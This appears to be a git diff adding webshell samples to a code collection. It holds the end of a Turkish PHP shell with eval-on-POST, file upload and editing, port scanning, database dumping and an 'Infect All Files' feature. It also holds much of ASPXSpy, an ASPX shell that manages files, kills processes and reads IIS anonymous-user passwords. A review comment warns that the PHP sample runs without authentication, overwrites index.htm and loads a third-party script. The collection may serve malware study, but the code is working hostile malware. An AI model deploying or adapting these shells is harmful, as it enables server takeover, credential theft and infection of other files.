name=php_eval cols=100 rows=5></textarea><br> + <input type='submit' value='Calistir!'> + </form> +"; +} + +if(isset($phpeval)) { +echo " +<form method='post' action=''> +<textarea name=php_eval cols=100 rows=10>"; +$wr = '"'; + $eval = @str_replace("<?","",$phpeval); + $eval = @str_replace("?>","",$phpeval); + @eval($eval); +echo "</textarea><br><input type='submit' value='Calistir!'></form>"; + +} +echo "<form method='post' action=''><input type='submit' value='Infect All Files!' name='inf3ct'> - <input type='submit' value='Eval Infect Files!' name='evalinfect'><br>"; +if(isset($textzz)) { echo $textzz; } +if(isset($textz0)) { echo $textz0; } +echo "</center></form></td></tr><tr><td> +<center><b><font size='2' face='Verdana'>:: Edit File ::<br></font></b> +<form method='post' action=''> +<input type='text' name='editfile' value=".$dir."> +<input type='submit' value='Go' name='doedit'> +</form>"; +// Edit Files n3xpl0rer +if(isset($_POST['doedit']) && $_POST['editfile'] != $dir) +{ +$file = $_POST['editfile']; +$content = file_get_contents($file); +echo "<form action='' method='post'><center> +<input type='hidden' name='editfile' value='".$file."'> +<textarea rows=20 cols=80 name='newtext'>".htmlspecialchars($content)."</textarea><br /><input type='submit' name='edit' value='Edit'></form>"; +} +if(isset($_POST['edit'])) { +$file = $_POST['editfile']; +echo $file."<br />"; +$fh = fopen($file, "w+")or die("<font color=red>Error: cannot open file</font>"); +fwrite($fh, stripslashes($_POST['newtext']))or die("<font color=red>Error: cannot write to file</font>"); +fclose($fh); +echo "Done.</td></tr>"; +} +echo " +</table> +<table class='menu' cellspacing='0' cellpadding='0' border='0' width='100%'> +<tr> +<td valign=top> +<center><b><font size='2' face='Verdana'>Dizin'e Git:<br></font></b> +<form name='directory' method='post' action=''> +<input type='text' name='dir' value=$dir> +<input type='submit' value='Go'> +</form></td><td> +<center><b><font size='2' 
face='Verdana'> Port Tarayýcý <br></font></b> + <form name='scanner' method='post'> + <input type='text' name='host' value='127.0.0.1' > + <select name='protocol'> + <option value='tcp'>tcp</option> + <option value='udp'>udp</option> + </select> + <input type='submit' value='Portlarý TARA'> + </form> +"; +if(isset($host) && isset($proto)) +{ +echo "<font size='2' face='Verdana'>Open Ports:"; + +for($current = 0; $current <= 23; $current++) +{ +$currents = $myports[$current]; + +$service = getservbyport($currents, $proto); + + +// Try to connect to port +$result = fsockopen($host, $currents, $errno, $errstr, 1); + +// Show results +if($result) +{ +echo "$currents, "; +} + + +} +} + +echo "</font> +</td></tr> + +<tr> +<td valign=top width=50%> +<center><b><font size='2' face='Verdana'>Dosya Upload<br></font></b> + <form method='post' action='' enctype='multipart/form-data'> + <input type='hidden' name='dare' value=$dir> + <input type='file' name='ffile'> + <input type='submit' name='ok' value='Upload!'> + </center> + </form> +</td> +<td valign=top> +<center><b><font size='2' face='Verdana'>Dosya Sil<br></font></b> + <form method='post' action=''> + <input type='text' name='delete' value=$dir > <input type='submit' value='Dosyayý Sil' name='deletfilez'> + </center> + </form> +</td></tr> +<tr> +<td valign=top> + +<center><b><font size='2' face='Verdana'>Klasör Oluþtur<br></font></b> + <form method='post' action=''> + <input type='text' name='makedir' value=$dir> <input type='submit' value='Oluþtur'> + </center> + </form> +</td> +<td valign=top> +<center><b><font size='2' face='Verdana'>Klasör Sil<br></font></b> + <form method='post' action=''> + <input type='text' name='deletedir' value=$dir> <input type='submit' value='Sil'> + </center> + </form> +</td></tr> +<tr> +<td valign=top width=50%> +<center><b><font size='2' face='Verdana'>Dosya Oluþtur:<br></font></b> + <form method='post' action=''> + <input type='hidden' name='darezz' value=$dir> + <font size='1' 
face='Verdana'>ADI:</font><br> + <input type='text' name='names' size='30'><br> + <font size='1' face='Verdana'>Kodu:</font><br> + <textarea rows='16' cols='30' name='source'></textarea><br> + <input type='submit' value='Upload'> + </center> + </form> +</td> +<td valign=top width=50%> +<center><b><font size='2' face='Verdana'>Database<br></font></b> + <form method='post' action=''> + <font size='1' face='Verdana'>Username: - Password:</font><br> + <input type='text' name='user' size='10'> + <input type='text' name='passd' size='10'><br> + <font size='1' face='Verdana'>Host:</font><br> + <input type='text' name='host' value='localhost'><br> + <font size='1' face='Verdana'>DB Name:</font><br> + <input type='text' name='db'><br> + <font size='1' face='Verdana'>Sorgu:</font><br> + <textarea rows='10' cols='30' name='query'></textarea><br> + <input type='submit' value='Sorguyu Calistir' name='godb'><br><input type='submit' name='dump' value='Database'yi Dump Et'> + </center> + </form> +</td> </tr> + +</table> +</table> +<br /> +<table class='menu' cellspacing='0' cellpadding='0' border='0' width='100%'> +<tr> +<td valign=top> +<center><b><font size='1' face='Verdana'> +CW Exploiter TIM // Cyber Security +</center></font></td></tr> +</body> +</html>"; + + +?> diff --git a/php/aspx.php b/php/aspx.php new file mode 100644 index 0000000..c108f24 --- /dev/null +++ b/php/aspx.php 
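Review bot: CWShellDumper.php is added as a directly servable `.php` file with no login or token check anywhere in the hunk, so a checkout of this collection under a web root exposes its `php_eval` → `eval()` and `cmdex` → `system()`/`passthru()` handlers to any unauthenticated request. It also has side effects just from being loaded: the first four statements overwrite `index.htm` in the working directory, and the page it prints includes `<SCRIPT SRC=http://r57.biz/yazciz/ciz.js>`, which presumably lets a third party learn where the sample is hosted. I would keep the sample byte-identical but store it inert (non-executable extension or an archive) and add a sidecar entry such as `CWShellDumper.php: no auth; overwrites index.htm on load; loads r57.biz/yazciz/ciz.js; drops cbs.pl and logseraser.pl; inf3ct/evalinfect append include/eval stubs to every *.php in cwd`. The last item matters for responders: finding this file on a host means every sibling PHP file needs checking for the appended stub, not just this one.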
@@ -0,0 +1,2590 @@
+<%@ Page Language="C#" Debug="true" trace="false" validateRequest="false" EnableViewStateMac="false" EnableViewState="true"%>
+<%@ import Namespace="System.IO"%>
+<%@ import Namespace="System.Diagnostics"%>
+<%@ import Namespace="System.Data"%>
+<%@ import Namespace="System.Management"%>
+<%@ import Namespace="System.Data.OleDb"%>
+<%@ import Namespace="Microsoft.Win32"%>
+<%@ import Namespace="System.Net.Sockets" %>
+<%@ import Namespace="System.Net" %>
+<%@ import Namespace="System.Runtime.InteropServices"%>
+<%@ import Namespace="System.DirectoryServices"%>
+<%@ import Namespace="System.ServiceProcess"%>
+<%@ import Namespace="System.Text.RegularExpressions"%>
+<%@ Import Namespace="System.Threading"%>
+<%@ Import Namespace="System.Data.SqlClient"%>
+<%@ import Namespace="Microsoft.VisualBasic"%>
+<%@ Assembly Name="System.DirectoryServices,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%>
+<%@ Assembly Name="System.Management,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%>
+<%@ Assembly Name="System.ServiceProcess,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%>
+<%@ Assembly Name="Microsoft.VisualBasic,Version=7.0.3300.0,Culture=neutral,PublicKeyToken=b03f5f7f11d50a3a"%>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
+<script runat="server">
+/*
+Thanks Snailsor,FuYu,BloodSword,Cnqing,
+Code by Bin
+Make in China
+Blog: http://alikaptanoglu.blogspot.com
+E-mail : ali_kaptanoglu@hotmail.com
+*/
+public string Password="21232f297a57a5a743894a0e4a801fc3";//admin
+public string vbhLn="ASPXSpy";
+public int TdgGU=1;
+protected OleDbConnection Dtdr=new OleDbConnection();
+protected OleDbCommand Kkvb=new OleDbCommand();
+public NetworkStream NS=null;
+public NetworkStream NS1=null;
+TcpClient tcp=new TcpClient();
+TcpClient zvxm=new TcpClient();
+ArrayList IVc=new ArrayList();
+protected void Page_load(object 
sender,EventArgs e) +{ +YFcNP(this); +fhAEn(); +if (!pdo()) +{ +return; +} +if(IsPostBack) +{ +string tkI=Request["__EVENTTARGET"]; +string VqV=Request["__File"]; +if(tkI!="") +{ +switch(tkI) +{ +case "Bin_Parent": +krIR(Ebgw(VqV)); +break; +case "Bin_Listdir": +krIR(Ebgw(VqV)); +break; +case "kRXgt": +kRXgt(Ebgw(VqV)); +break; +case "Bin_Createfile": +gLKc(VqV); +break; +case "Bin_Editfile": +gLKc(VqV); +break; +case "Bin_Createdir": +stNPw(VqV); +break; +case "cYAl": +cYAl(VqV); +break; +case "ksGR": +ksGR(Ebgw(VqV)); +break; +case "SJv": +SJv(VqV); +break; +case "Bin_Regread": +tpRQ(Ebgw(VqV)); +break; +case "hae": +hae(); +break; +case "urJG": +urJG(VqV); +break; +} +if(tkI.StartsWith("dAJTD")) +{ +dAJTD(Ebgw(tkI.Replace("dAJTD","")),VqV); +} +else if(tkI.StartsWith("Tlvz")) +{ +Tlvz(Ebgw(tkI.Replace("Tlvz","")),VqV); +} +else if(tkI.StartsWith("Bin_CFile")) +{ +YByN(Ebgw(tkI.Replace("Bin_CFile","")),VqV); +} +} +} +else +{ +PBZw(); +} +} +public bool pdo() +{ +if(Request.Cookies[vbhLn]==null) +{ +tZSx(); +return false; +} +else +{ +if (Request.Cookies[vbhLn].Value != Password) +{ +tZSx(); +return false; +} +else +{ +return true; +} +} +} +public void tZSx() +{ +ljtzC.Visible=true; +ZVS.Visible=false; +} +protected void YKpI(object sender,EventArgs e) +{ +Session.Abandon(); +Response.Cookies.Add(new HttpCookie(vbhLn,null)); +tZSx(); +} +public void PBZw() +{ +ZVS.Visible=true; +ljtzC.Visible=false; +Bin_Button_CreateFile.Attributes["onClick"]="var filename=prompt('Please input the file name:','');if(filename){Bin_PostBack('Bin_Createfile',filename);}"; +Bin_Button_CreateDir.Attributes["onClick"]="var filename=prompt('Please input the directory name:','');if(filename){Bin_PostBack('Bin_Createdir',filename);}"; +Bin_Button_KillMe.Attributes["onClick"]="if(confirm('Are you sure delete ASPXSPY?')){Bin_PostBack('hae','');};"; 
+Bin_Span_Sname.InnerHtml=Request.ServerVariables["LOCAL_ADDR"]+":"+Request.ServerVariables["SERVER_PORT"]+"("+Request.ServerVariables["SERVER_NAME"]+")"; +Bin_Span_FrameVersion.InnerHtml="Framework Ver : "+Environment.Version.ToString(); +if (AXSbb.Value==string.Empty) +{ +AXSbb.Value=OElM(Server.MapPath(".")); +} +Bin_H2_Title.InnerText="File Manager >>"; +krIR(AXSbb.Value); +} +public void fhAEn() +{ +try +{ +string[] YRgt=Directory.GetLogicalDrives(); +for(int i=0;i<YRgt.Length;i++) +{ +Control c=ParseControl(" <asp:LinkButton Text='"+mFvj(YRgt[i])+"' ID=\"Bin_Button_Driv"+i+"\" runat='server' commandargument= '"+YRgt[i]+"'/> | "); +Bin_Span_Drv.Controls.Add(c); +LinkButton nxeDR=(LinkButton)Page.FindControl("Bin_Button_Driv"+i); +nxeDR.Command+=new CommandEventHandler(this.iVk); +} +}catch(Exception ex){} +} +public string OElM(string path) +{ +if(path.Substring(path.Length-1,1)!=@"\") +{ +path=path+@"\"; +} +return path; +} +public string nrrx(string path) +{ +char[] trim={'\\'}; +if(path.Substring(path.Length-1,1)==@"\") +{ +path=path.TrimEnd(trim); +} +return path; +} +[DllImport("kernel32.dll",EntryPoint="GetDriveTypeA")] +public static extern int OMZP(string nDrive); +public string mFvj(string instr) +{ +string EuXD=string.Empty; +int num=OMZP(instr); +switch(num) +{ +case 1: +EuXD="Unknow("+instr+")"; +break; +case 2: +EuXD="Removable("+instr+")"; +break; +case 3: +EuXD="Fixed("+instr+")"; +break; +case 4: +EuXD="Network("+instr+")"; +break; +case 5: +EuXD="CDRom("+instr+")"; +break; +case 6: +EuXD="RAM Disk("+instr+")"; +break; +} +return EuXD.Replace(@"\",""); +} +public string MVVJ(string instr) +{ +byte[] tmp=Encoding.Default.GetBytes(instr); +return Convert.ToBase64String(tmp); +} +public string Ebgw(string instr) +{ +byte[] tmp=Convert.FromBase64String(instr); +return Encoding.Default.GetString(tmp); +} +public void krIR(string path) +{ +WICxe(); +CzfO.Visible=true; +Bin_H2_Title.InnerText="File Manager >>"; +AXSbb.Value=OElM(path); +DirectoryInfo 
GQMM=new DirectoryInfo(path); +if(Directory.GetParent(nrrx(path))!=null) +{ +string bg=OKM(); +TableRow p=new TableRow(); +for(int i=1;i<6;i++) +{ +TableCell pc=new TableCell(); +if(i==1) +{ +pc.Width=Unit.Parse("2%"); +pc.Text="0"; +p.CssClass=bg; +} +if(i==2) +{ +pc.Text="<a href=\"javascript:Bin_PostBack('Bin_Parent','"+MVVJ(Directory.GetParent(nrrx(path)).ToString())+"')\">Parent Directory</a>"; +} +p.Cells.Add(pc); +UGzP.Rows.Add(p); +} +} +try +{ +int vLlH=0; +foreach(DirectoryInfo Bin_folder in GQMM.GetDirectories()) +{ +string bg=OKM(); +vLlH++; +TableRow tr=new TableRow(); +TableCell tc=new TableCell(); +tc.Width=Unit.Parse("2%"); +tc.Text="0"; +tr.Attributes["onmouseover"]="this.className='focus';"; +tr.CssClass=bg; +tr.Attributes["onmouseout"]="this.className='"+bg+"';"; +tr.Cells.Add(tc); +TableCell HczyN=new TableCell(); +HczyN.Text="<a href=\"javascript:Bin_PostBack('Bin_Listdir','"+MVVJ(AXSbb.Value+Bin_folder.Name)+"')\">"+Bin_folder.Name+"</a>"; +tr.Cells.Add(HczyN); +TableCell LYZK=new TableCell(); +LYZK.Text=Bin_folder.LastWriteTimeUtc.ToString("yyyy-MM-dd hh:mm:ss"); +tr.Cells.Add(LYZK); +UGzP.Rows.Add(tr); +TableCell ERUL=new TableCell(); +ERUL.Text="--"; +tr.Cells.Add(ERUL); +UGzP.Rows.Add(tr); +TableCell ZGKh=new TableCell(); +ZGKh.Text="<a href=\"javascript:if(confirm('Are you sure will delete it ?\\n\\nIf non-empty directory,will be delete all the files.')){Bin_PostBack('kRXgt','"+MVVJ(AXSbb.Value+Bin_folder.Name)+"')};\">Del</a> | <a href='#' onclick=\"var filename=prompt('Please input the new folder name:','"+AXSbb.Value.Replace(@"\",@"\\")+Bin_folder.Name.Replace("'","\\'")+"');if(filename){Bin_PostBack('dAJTD"+MVVJ(AXSbb.Value+Bin_folder.Name)+"',filename);} \">Rename</a>"; +tr.Cells.Add(ZGKh); +UGzP.Rows.Add(tr); +} +TableRow cKVA=new TableRow(); +cKVA.Attributes["style"]="border-top:1px solid #fff;border-bottom:1px solid #ddd;"; +cKVA.Attributes["bgcolor"]="#dddddd"; +TableCell JlmW=new TableCell(); +JlmW.Attributes["colspan"]="6" ; 
+JlmW.Attributes["height"]="5"; +cKVA.Cells.Add(JlmW); +UGzP.Rows.Add(cKVA); +int aYRwo=0; +foreach(FileInfo Bin_Files in GQMM.GetFiles()) +{ +aYRwo++; +string gb=OKM(); +TableRow tr=new TableRow(); +TableCell tc=new TableCell(); +tc.Width=Unit.Parse("2%"); +tc.Text="<input type=\"checkbox\" value=\"0\" name=\""+MVVJ(Bin_Files.Name)+"\">"; +tr.Attributes["onmouseover"]="this.className='focus';"; +tr.CssClass=gb; +tr.Attributes["onmouseout"]="this.className='"+gb+"';"; +tr.Cells.Add(tc); +TableCell filename=new TableCell(); +if(Bin_Files.FullName.StartsWith(Request.PhysicalApplicationPath)) +{ +string url=Request.Url.ToString(); +filename.Text="<a href=\""+Bin_Files.FullName.Replace(Request.PhysicalApplicationPath,url.Substring(0,url.IndexOf('/',8)+1)).Replace("\\","/")+"\" target=\"_blank\">"+Bin_Files.Name+"</a>"; +} +else +{ +filename.Text=Bin_Files.Name; +} +TableCell albt=new TableCell(); +albt.Text=Bin_Files.LastWriteTimeUtc.ToString("yyyy-MM-dd hh:mm:ss"); +TableCell YzK=new TableCell(); +YzK.Text=mTG(Bin_Files.Length); +TableCell GLpi=new TableCell(); +GLpi.Text="<a href=\"#\" onclick=\"Bin_PostBack('ksGR','"+MVVJ(AXSbb.Value+Bin_Files.Name)+"')\">Down</a> | <a href='#' onclick=\"var filename=prompt('Please input the new path(full path):','"+AXSbb.Value.Replace(@"\",@"\\")+Bin_Files.Name.Replace("'","\\'")+"');if(filename){Bin_PostBack('Bin_CFile"+MVVJ(AXSbb.Value+Bin_Files.Name)+"',filename);} \">Copy</a> | <a href=\"#\" onclick=\"Bin_PostBack('Bin_Editfile','"+Bin_Files.Name+"')\">Edit</a> | <a href='#' onclick=\"var filename=prompt('Please input the new file name(full path):','"+AXSbb.Value.Replace(@"\",@"\\")+Bin_Files.Name.Replace("'","\\'")+"');if(filename){Bin_PostBack('Tlvz"+MVVJ(AXSbb.Value+Bin_Files.Name)+"',filename);} \">Rename</a> | <a href=\"#\" onclick=\"Bin_PostBack('cYAl','"+Bin_Files.Name+"')\">Time</a> "; +tr.Cells.Add(filename); +tr.Cells.Add(albt); +tr.Cells.Add(YzK); +tr.Cells.Add(GLpi); +UGzP.Rows.Add(tr); +} +string lgb=OKM(); 
+TableRow oWam=new TableRow(); +oWam.CssClass=lgb; +for(int i=1;i<4;i++) +{ +TableCell lGV=new TableCell(); +if(i==1) +{ +lGV.Text="<input name=\"chkall\" value=\"on\" type=\"checkbox\" onclick=\"var ck=document.getElementsByTagName('input');for(var i=0;i<ck.length-1;i++){if(ck[i].type=='checkbox'&&ck[i].name!='chkall'){ck[i].checked=forms[0].chkall.checked;}}\"/>"; +} +if(i==2) +{ +lGV.Text="<a href=\"#\" Onclick=\"var d_file='';var ck=document.getElementsByTagName('input');for(var i=0;i<ck.length-1;i++){if(ck[i].checked&&ck[i].name!='chkall'){d_file+=ck[i].name+',';}};if(d_file==null || d_file==''){ return;} else {if(confirm('Are you sure delete the files ?')){Bin_PostBack('SJv',d_file)};}\">Delete selected</a>"; +} +if(i==3) +{ +lGV.ColumnSpan=4; +lGV.Style.Add("text-align","right"); +lGV.Text=vLlH+" directories/ "+aYRwo+" files"; +} +oWam.Cells.Add(lGV); +} +UGzP.Rows.Add(oWam); +} +catch(Exception error) +{ +xseuB(error.Message); +} +} +public string OKM() +{ +TdgGU++; +if(TdgGU % 2==0) +{ +return "alt1"; +} +else +{ +return "alt2"; +} +} +public void kRXgt(string qcKu) +{ +try +{ +Directory.Delete(qcKu,true); +xseuB("Directory delete new success !"); +} +catch(Exception error) +{ +xseuB(error.Message); +} +krIR(Directory.GetParent(qcKu).ToString()); +} +public void dAJTD(string sdir,string ddir) +{ +try +{ +Directory.Move(sdir,ddir); +xseuB("Directory Renamed Success !"); +} +catch(Exception error) +{ +xseuB(error.Message); +} +krIR(AXSbb.Value); +} +public void Tlvz(string sfile,string dfile) +{ +try +{ +File.Move(sfile,dfile); +xseuB("File Renamed Success !"); +} +catch(Exception error) +{ +xseuB(error.Message); +} +krIR(AXSbb.Value); +} +public void YByN(string spath,string dpath) +{ +try +{ +File.Copy(spath,dpath); +xseuB("File Copy Success !"); +} +catch(Exception error) +{ +xseuB(error.Message); +} +krIR(AXSbb.Value); +} +public void stNPw(string path) +{ +try +{ +Directory.CreateDirectory(AXSbb.Value+path); +xseuB("Directory created success !"); +} 
+catch(Exception error) +{ +xseuB(error.Message); +} +krIR(AXSbb.Value); +} +public void gLKc(string path) +{ +if(Request["__EVENTTARGET"]=="Bin_Editfile" || Request["__EVENTTARGET"]=="Bin_Createfile") +{ +foreach(ListItem item in NdCX.Items) +{ +if(item.Selected=true) +{ +item.Selected=false; +} +} +} +Bin_H2_Title.InnerHtml="Create/ Edit File >>"; +WICxe(); +vrFA.Visible=true; +if(path.IndexOf(":")< 0) +{ +Sqon.Value=AXSbb.Value+path; +} +else +{ +Sqon.Value=path; +} +if(File.Exists(Sqon.Value)) +{ +StreamReader sr; +if(NdCX.SelectedItem.Text=="UTF-8") +{ +sr=new StreamReader(Sqon.Value,Encoding.UTF8); +} +else +{ +sr=new StreamReader(Sqon.Value,Encoding.Default); +} +Xgvv.InnerText=sr.ReadToEnd(); +sr.Close(); +} +else +{ +Xgvv.InnerText=string.Empty; +} +} +public void ksGR(string path) +{ +FileInfo fs=new FileInfo(path); +Response.Clear(); +Page.Response.ClearHeaders(); +Page.Response.Buffer=false; +this.EnableViewState=false; +Response.AddHeader("Content-Disposition","attachment;filename="+HttpUtility.UrlEncode(fs.Name,System.Text.Encoding.UTF8)); +Response.AddHeader("Content-Length",fs.Length.ToString()); +Page.Response.ContentType="application/unknown"; +Response.WriteFile(fs.FullName); +Page.Response.Flush(); +Page.Response.Close(); +Response.End(); +Page.Response.Clear(); +} +public void SJv(string path) +{ +try +{ +string[] spdT=path.Split(','); +for(int i=0;i<spdT.Length-1;i++) +{ +File.Delete(AXSbb.Value+Ebgw(spdT[i])); +} +xseuB("File Delete Success !"); +} +catch(Exception error) +{ +xseuB(error.Message); +} +krIR(AXSbb.Value); +} +public void hae() +{ +try +{ +File.Delete(Request.PhysicalPath); +Response.Redirect("http://www.rootkit.net.cn"); +} +catch(Exception error) +{ +xseuB(error.Message); +} +} +public void cYAl(string path) +{ +Bin_H2_Title.InnerHtml="Clone file was last modified time >>"; +WICxe(); +zRyG.Visible=true; +QiFB.Value=AXSbb.Value+path; +lICp.Value=AXSbb.Value; +pWVL.Value=AXSbb.Value+path; +string 
Att=File.GetAttributes(QiFB.Value).ToString(); +if(Att.LastIndexOf("ReadOnly")!=-1) +{ +ZhWSK.Checked=true; +} +if(Att.LastIndexOf("System")!=-1) +{ +SsR.Checked=true; +} +if(Att.LastIndexOf("Hidden")!=-1) +{ +ccB.Checked=true; +} +if(Att.LastIndexOf("Archive")!=-1) +{ +fbyZ.Checked=true; +} +yUqx.Value=File.GetCreationTimeUtc(pWVL.Value).ToString(); +uYjw.Value=File.GetLastWriteTimeUtc(pWVL.Value).ToString(); +aLsn.Value=File.GetLastAccessTimeUtc(pWVL.Value).ToString(); +} +public static String mTG(Int64 fileSize) +{ +if(fileSize<0) +{ +throw new ArgumentOutOfRangeException("fileSize"); +} +else if(fileSize >= 1024 * 1024 * 1024) +{ +return string.Format("{0:########0.00} G",((Double)fileSize)/(1024 * 1024 * 1024)); +} +else if(fileSize >= 1024 * 1024) +{ +return string.Format("{0:####0.00} M",((Double)fileSize)/(1024 * 1024)); +} +else if(fileSize >= 1024) +{ +return string.Format("{0:####0.00} K",((Double)fileSize)/ 1024); +} +else +{ +return string.Format("{0} B",fileSize); +} +} +private bool SGde(string sSrc) +{ +Regex reg=new Regex(@"^0|[0-9]*[1-9][0-9]*$"); +if(reg.IsMatch(sSrc)) +{ +return true; +} +else +{ +return false; +} +} +public void AdCx() +{ +string qcKu=string.Empty; +string mWGEm="IIS://localhost/W3SVC"; +GlI.Style.Add("word-break","break-all"); +try +{ +DirectoryEntry HHzcY=new DirectoryEntry(mWGEm); +int fmW=0; +foreach(DirectoryEntry child in HHzcY.Children) +{ +if(SGde(child.Name.ToString())) +{ +fmW++; +DirectoryEntry newdir=new DirectoryEntry(mWGEm+"/"+child.Name.ToString()); +DirectoryEntry HlyU=newdir.Children.Find("root","IIsWebVirtualDir"); +string bg=OKM(); +TableRow TR=new TableRow(); +TR.Attributes["onmouseover"]="this.className='focus';"; +TR.CssClass=bg; +TR.Attributes["onmouseout"]="this.className='"+bg+"';"; +TR.Attributes["title"]="Site:"+child.Properties["ServerComment"].Value.ToString(); +for(int i=1;i<6;i++) +{ +try +{ +TableCell tfit=new TableCell(); +switch(i) +{case 1: +tfit.Text=fmW.ToString(); +break; +case 2: 
+tfit.Text=HlyU.Properties["AnonymousUserName"].Value.ToString(); +break; +case 3: +tfit.Text=HlyU.Properties["AnonymousUserPass"].Value.ToString(); +break; +case 4: +StringBuilder sb=new StringBuilder(); +PropertyValueCollection pc=child.Properties["ServerBindings"]; +for (int j=0; j < pc.Count; j++) +{ +sb.Append(pc[j].ToString()+"<br>"); +} +tfit.Text=sb.ToString().Substring(0,sb.ToString().Length-4); +break; +case 5: +tfit.Text="<a href=\"javascript:Bin_PostBack('Bin_Listdir','"+MVVJ(HlyU.Properties["Path"].Value.ToString())+"')\">"+HlyU.Properties["Path"].Value.ToString()+"</a>"; +break; +} +TR.Cells.Add(tfit); +} +catch (Exception ex) +{ +xseuB(ex.Message); +continue; +} +} +GlI.Controls.Add(TR); +} +} +} +catch(Exception ex) +{ +xseuB(ex.Message); +} +} +public ManagementObjectCollection PhQTd(string query) +{ +ManagementObjectSearcher QS=new ManagementObjectSearcher(new SelectQuery(query)); +return QS.Get(); +} +public DataTable cCf(string query) +{ +DataTable dt=new DataTable(); +int i=0; +ManagementObjectSearcher QS=new ManagementObjectSearcher(new SelectQuery(query)); +try +{ +foreach(ManagementObject m in QS.Get()) +{ +DataRow dr=dt.NewRow(); +PropertyDataCollection.PropertyDataEnumerator oEnum; +oEnum=(m.Properties.GetEnumerator()as PropertyDataCollection.PropertyDataEnumerator); +while(oEnum.MoveNext()) +{ +PropertyData DRU=(PropertyData)oEnum.Current; +if(dt.Columns.IndexOf(DRU.Name)==-1) +{ +dt.Columns.Add(DRU.Name); +dt.Columns[dt.Columns.Count-1].DefaultValue=""; +} +if(m[DRU.Name]!=null) +{ +dr[DRU.Name]=m[DRU.Name].ToString(); +} +else +{ +dr[DRU.Name]=string.Empty; +} +} +dt.Rows.Add(dr); +} +} +catch(Exception error) +{ +} +return dt; +} +public void YUw() +{ +try +{ +Bin_H2_Title.InnerText="Process >>"; +WICxe(); +DCbS.Visible=true; +int UEbTI=0; +Process[] p=Process.GetProcesses(); +foreach(Process sp in p) +{ +UEbTI++; +string bg=OKM(); +TableRow tr=new TableRow(); +tr.Attributes["onmouseover"]="this.className='focus';"; +tr.CssClass=bg; 
+tr.Attributes["onmouseout"]="this.className='"+bg+"';"; +for(int i=1;i<7;i++) +{ +TableCell td=new TableCell(); +if(i==1) +{ +td.Width=Unit.Parse("2%"); +td.Text=UEbTI.ToString(); +tr.Controls.Add(td); +} +if(i==2) +{ +td.Text=sp.Id.ToString(); +tr.Controls.Add(td); +} +if(i==3) +{ +td.Text=sp.ProcessName.ToString(); +tr.Controls.Add(td); +} +if(i==4) +{ +td.Text=sp.Threads.Count.ToString(); +tr.Controls.Add(td); +} +if(i==5) +{ +td.Text=sp.BasePriority.ToString(); +tr.Controls.Add(td); +} +if(i==6) +{ +td.Text="--"; +tr.Controls.Add(td); +} +} +IjsL.Controls.Add(tr); +} +} +catch(Exception error) +{ +AIz(); +} +AIz(); +} +public void AIz() +{ +try +{ +Bin_H2_Title.InnerText="Process >>"; +WICxe(); +DCbS.Visible=true; +int UEbTI=0; +DataTable dt=cCf("Win32_Process"); +for(int j=0;j<dt.Rows.Count;j++) +{ +UEbTI++; +string bg=OKM(); +TableRow tr=new TableRow(); +tr.Attributes["onmouseover"]="this.className='focus';"; +tr.CssClass=bg; +tr.Attributes["onmouseout"]="this.className='"+bg+"';"; +for(int i=1;i<7;i++) +{ +TableCell td=new TableCell(); +if(i==1) +{ +td.Width=Unit.Parse("2%"); +td.Text=UEbTI.ToString(); +tr.Controls.Add(td); +} +if(i==2) +{ +td.Text=dt.Rows[j]["ProcessID"].ToString(); +tr.Controls.Add(td); +} +if(i==3) +{ +td.Text=dt.Rows[j]["Name"].ToString(); +tr.Controls.Add(td); +} +if(i==4) +{ +td.Text=dt.Rows[j]["ThreadCount"].ToString(); +tr.Controls.Add(td); +} +if(i==5) +{ +td.Text=dt.Rows[j]["Priority"].ToString(); +tr.Controls.Add(td); +} +if(i==6) +{ +if( dt.Rows[j]["CommandLine"]!=string.Empty) +{ +td.Text="<a href=\"javascript:Bin_PostBack('urJG','"+dt.Rows[j]["ProcessID"].ToString()+"')\">Kill</a>"; +} +else +{ +td.Text="--"; +} +tr.Controls.Add(td); +} +} +IjsL.Controls.Add(tr); +} +} +catch(Exception error) +{ +xseuB(error.Message); +} +} +public void urJG(string pid) +{ +try +{ +foreach(ManagementObject p in PhQTd("Select * from Win32_Process Where ProcessID ='"+pid+"'")) +{ +p.InvokeMethod("Terminate",null); +p.Dispose(); +} 
+xseuB("Process Kill Success !"); +} +catch(Exception error) +{ +xseuB(error.Message); +} +AIz(); +} +public void oHpF() +{ +try +{ +Bin_H2_Title.InnerText="Services >>"; +WICxe(); +iQxm.Visible=true; +int UEbTI=0; +ServiceController[] kQmRu=System.ServiceProcess.ServiceController.GetServices(); +for(int i=0;i<kQmRu.Length;i++) +{ +UEbTI++; +string bg=OKM(); +TableRow tr=new TableRow(); +tr.Attributes["onmouseover"]="this.className='focus';"; +tr.CssClass=bg; +tr.Attributes["onmouseout"]="this.className='"+bg+"';"; +for(int b=1;b<7;b++) +{ +TableCell td=new TableCell(); +if(b==1) +{ +td.Width=Unit.Parse("2%"); +td.Text=UEbTI.ToString(); +tr.Controls.Add(td); +} +if(b==2) +{ +td.Text="null"; +tr.Controls.Add(td); +} +if(b==3) +{ +td.Text=kQmRu[i].ServiceName.ToString(); +tr.Controls.Add(td); +} +if(b==4) +{ +td.Text=""; +tr.Controls.Add(td); +} +if(b==5) +{ +string kOIo=kQmRu[i].Status.ToString(); +if(kOIo=="Running") +{ +td.Text="<font color=green>"+kOIo+"</font>"; +} +else +{ +td.Text="<font color=red>"+kOIo+"</font>"; +} +tr.Controls.Add(td); +} +if(b==6) +{ +td.Text=""; +tr.Controls.Add(td); +} +} +vHCs.Controls.Add(tr); +} +} +catch(Exception error) +{ +xseuB(error.Message); +} +} +public void tZRH() +{ +try +{ +Bin_H2_Title.InnerText="Services >>"; +WICxe(); +iQxm.Visible=true; +int UEbTI=0; +DataTable dt=cCf("Win32_Service"); +for(int j=0;j<dt.Rows.Count;j++) +{ +UEbTI++; +string bg=OKM(); +TableRow tr=new TableRow(); +tr.Attributes["onmouseover"]="this.className='focus';"; +tr.CssClass=bg; +tr.Attributes["onmouseout"]="this.className='"+bg+"';"; +tr.Attributes["title"]=dt.Rows[j]["Description"].ToString(); +for(int i=1;i<7;i++) +{ +TableCell td=new TableCell(); +if(i==1) +{ +td.Width=Unit.Parse("2%"); +td.Text=UEbTI.ToString(); +tr.Controls.Add(td); +} +if(i==2) +{ 